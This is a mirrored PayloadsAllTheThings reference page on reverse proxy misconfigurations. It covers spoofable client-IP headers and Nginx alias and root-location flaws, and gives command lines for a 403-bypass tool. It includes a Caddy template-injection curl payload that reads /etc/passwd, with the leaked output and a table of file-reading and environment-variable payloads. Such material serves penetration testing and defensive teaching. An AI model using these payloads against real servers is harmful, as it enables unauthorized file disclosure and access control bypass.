mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-08-25 01:45:15 +02:00
165 lines
6.6 KiB
Markdown
165 lines
6.6 KiB
Markdown
# Reverse Proxy Misconfigurations
|
||
|
||
> A reverse proxy is a server that sits between clients and backend servers, forwarding client requests to the appropriate server while hiding the backend infrastructure and often providing load balancing or caching. Misconfigurations in a reverse proxy, such as improper access controls, lack of input sanitization in proxy_pass directives, or trusting client-provided headers like X-Forwarded-For, can lead to vulnerabilities like unauthorized access, directory traversal, or exposure of internal resources.
|
||
|
||
## Summary
|
||
|
||
* [Tools](#tools)
|
||
* [Methodology](#methodology)
|
||
* [HTTP Headers](#http-headers)
|
||
* [X-Forwarded-For](#x-forwarded-for)
|
||
* [X-Real-IP](#x-real-ip)
|
||
* [True-Client-IP](#true-client-ip)
|
||
* [Nginx](#nginx)
|
||
* [Off By Slash](#off-by-slash)
|
||
* [Missing Root Location](#missing-root-location)
|
||
* [Caddy](#caddy)
|
||
* [Template Injection](#template-injection)
|
||
* [Labs](#labs)
|
||
* [References](#references)
|
||
|
||
## Tools
|
||
|
||
* [yandex/gixy](https://github.com/yandex/gixy) - Nginx configuration static analyzer.
|
||
* [shiblisec/Kyubi](https://github.com/shiblisec/Kyubi) - A tool to discover Nginx alias traversal misconfiguration.
|
||
* [laluka/bypass-url-parser](https://github.com/laluka/bypass-url-parser) - Tool that tests MANY url bypasses to reach a 40X protected page.
|
||
|
||
```ps1
|
||
bypass-url-parser -u "http://127.0.0.1/juicy_403_endpoint/" -s 8.8.8.8 -d
|
||
bypass-url-parser -u /path/urls -t 30 -T 5 -H "Cookie: me_iz=admin" -H "User-agent: test"
|
||
bypass-url-parser -R /path/request_file --request-tls -m "mid_paths, end_paths"
|
||
```
|
||
|
||
## Methodology
|
||
|
||
### HTTP Headers
|
||
|
||
Since headers like `X-Forwarded-For`, `X-Real-IP`, and `True-Client-IP` are just regular HTTP headers, a client can set or override them if it can control part of the traffic path—especially when directly connecting to the application server, or when reverse proxies are not properly filtering or validating these headers.
|
||
|
||
#### X-Forwarded-For
|
||
|
||
`X-Forwarded-For` is an HTTP header used to identify the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer.
|
||
|
||
When a client makes a request through a proxy or load balancer, that proxy adds an X-Forwarded-For header containing the client’s real IP address.
|
||
|
||
If there are multiple proxies (a request passes through several), each proxy adds the address from which it received the request to the header, comma-separated.
|
||
|
||
```ps1
|
||
X-Forwarded-For: 2.21.213.225, 104.16.148.244, 184.25.37.3
|
||
```
|
||
|
||
Nginx can override the header with the client's real IP address.
|
||
|
||
```ps1
|
||
proxy_set_header X-Forwarded-For $remote_addr;
|
||
```
|
||
|
||
#### X-Real-IP
|
||
|
||
`X-Real-IP` is another custom HTTP header, commonly used by Nginx and some other proxies, to forward the original client IP address. Rather than including a chain of IP addresses like X-Forwarded-For, X-Real-IP contains only a single IP: the address of the client connecting to the first proxy.
|
||
|
||
#### True-Client-IP
|
||
|
||
`True-Client-IP` is a header developed and standardized by some providers, particularly by Akamai, to pass the original client’s IP address through their infrastructure.
|
||
|
||
### Nginx
|
||
|
||
#### Off By Slash
|
||
|
||
Nginx matches incoming request URIs against the location blocks defined in your configuration.
|
||
|
||
* `location /app/` matches requests to `/app/`, `/app/foo`, `/app/bar/123`, etc.
|
||
* `location /app` (no trailing slash) matches `/app*` (i.e., `/application`, `/appfile`, etc.),
|
||
|
||
This means in Nginx, the presence or absence of a slash in a location block changes the matching logic.
|
||
|
||
```ps1
|
||
server {
|
||
location /app/ {
|
||
# Handles /app/ and anything below, e.g., /app/foo
|
||
}
|
||
location /app {
|
||
# Handles only /app with nothing after OR routes like /application, /appzzz
|
||
}
|
||
}
|
||
```
|
||
|
||
Example of a vulnerable configuration: An attacker requesting `/styles../secret.txt` resolves to `/path/styles/../secret.txt`
|
||
|
||
```ps1
|
||
location /styles {
|
||
alias /path/css/;
|
||
}
|
||
```
|
||
|
||
#### Missing Root Location
|
||
|
||
The `root /etc/nginx;` directive sets the server's root directory for static files.
|
||
The configuration doesn't have a root location `/`, it will be set globally set.
|
||
A request to `/nginx.conf` would resolve to `/etc/nginx/nginx.conf`.
|
||
|
||
```ps1
|
||
server {
|
||
root /etc/nginx;
|
||
|
||
location /hello.txt {
|
||
try_files $uri $uri/ =404;
|
||
proxy_pass http://127.0.0.1:8080/;
|
||
}
|
||
}
|
||
```
|
||
|
||
### Caddy
|
||
|
||
#### Template Injection
|
||
|
||
The provided Caddy web server config uses the `templates` directive, which allows dynamic content rendering with Go templates.
|
||
|
||
```ps1
|
||
:80 {
|
||
root * /
|
||
templates
|
||
respond "You came from {http.request.header.Referer}"
|
||
}
|
||
```
|
||
|
||
This tells Caddy to process the response string as a template, and interpolate any variables (using Go template syntax) present in the referenced request header.
|
||
|
||
In this curl request, the attacker supplied as `Referer` header a Go template expression: `{{readFile "etc/passwd"}}`.
|
||
|
||
```ps1
|
||
curl -H 'Referer: {{readFile "etc/passwd"}}' http://localhost/
|
||
```
|
||
|
||
```ps1
|
||
HTTP/1.1 200 OK
|
||
Content-Length: 716
|
||
Content-Type: text/plain; charset=utf-8
|
||
Server: Caddy
|
||
Date: Thu, 24 Jul 2025 08:00:50 GMT
|
||
|
||
You came from root:x:0:0:root:/root:/bin/sh
|
||
bin:x:1:1:bin:/bin:/sbin/nologin
|
||
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
||
```
|
||
|
||
Because Caddy is running the templates directive, it will evaluate anything in curly braces inside the context, including things from untrusted input. The `readFile` function is available in Caddy templates, so the attacker's input causes Caddy to actually read `/etc/passwd` and insert its content into the HTTP response.
|
||
|
||
| Payload | Description |
|
||
| ----------------------------- | ----------- |
|
||
| `{{env "VAR_NAME"}}` | Get an environment variable |
|
||
| `{{listFiles "/"}}` | List all files in a directory |
|
||
| `{{readFile "path/to/file"}}` | Read a file |
|
||
|
||
## Labs
|
||
|
||
* [Root Me - Nginx - Alias Misconfiguration](https://www.root-me.org/en/Challenges/Web-Server/Nginx-Alias-Misconfiguration)
|
||
* [Root Me - Nginx - Root Location Misconfiguration](https://www.root-me.org/en/Challenges/Web-Server/Nginx-Root-Location-Misconfiguration)
|
||
* [Root Me - Nginx - SSRF Misconfiguration](https://www.root-me.org/en/Challenges/Web-Server/Nginx-SSRF-Misconfiguration)
|
||
* [Detectify - Vulnerable Nginx](https://github.com/detectify/vulnerable-nginx)
|
||
|
||
## References
|
||
|
||
* [What is X-Forwarded-For and when can you trust it? - Phil Sturgeonopens - January 31, 2024](https://httptoolkit.com/blog/what-is-x-forwarded-for/)
|
||
* [Common Nginx misconfigurations that leave your web server open to attack - Detectify - November 10, 2020](https://blog.detectify.com/industry-insights/common-nginx-misconfigurations-that-leave-your-web-server-ope-to-attack/)
|